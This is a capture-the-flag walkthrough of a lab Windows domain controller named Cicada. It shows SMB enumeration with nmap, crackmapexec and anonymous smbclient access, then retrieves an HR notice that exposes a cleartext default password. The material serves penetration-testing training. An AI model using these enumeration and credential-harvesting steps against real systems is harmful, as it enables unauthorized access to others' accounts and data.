SMB
Nmap discovered a Windows Directory service on the target ports 139 and 445
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ nmap -Pn --script smb-enum-shares -sV -p139,445 $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-28 21:33 CEST
Nmap scan report for cicada-dc.cicada.htb (10.129.41.192)
Host is up (0.051s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.81 secondsAttempting to map the SMB shares failed, likely due to lack of privileges
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u ' ' -p ' ' --shares
SMB 10.129.41.192 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.41.192 445 CICADA-DC [+] cicada.htb\ :
SMB 10.129.41.192 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIEDN/A
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ smbclient -L //cicada-dc.cicada.htb/
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to cicada-dc.cicada.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableThe target SMB server allows anonymous authentication and I am able to list the shares The following shares are none default;
//cicada-dc.cicada.htb/DEV//cicada-dc.cicada.htb/HR
//cicada-dc.cicada.htb/DEV
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ smbclient //cicada-dc.cicada.htb/DEV
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*NT_STATUS_ACCESS_DENIED listing
//cicada-dc.cicada.htb/HR
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ smbclient //cicada-dc.cicada.htb/HR
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
4168447 blocks of size 4096. 267108 blocks availableThere is a single text file; Notice from HR.txt
Notice from HR.txt
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (10.8 KiloBytes/sec) (average 10.8 KiloBytes/sec)Downloading it to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpThe txt file contains a CLEARTEXT default credential; Cicada$M6Corpb*@Lp#nZp!8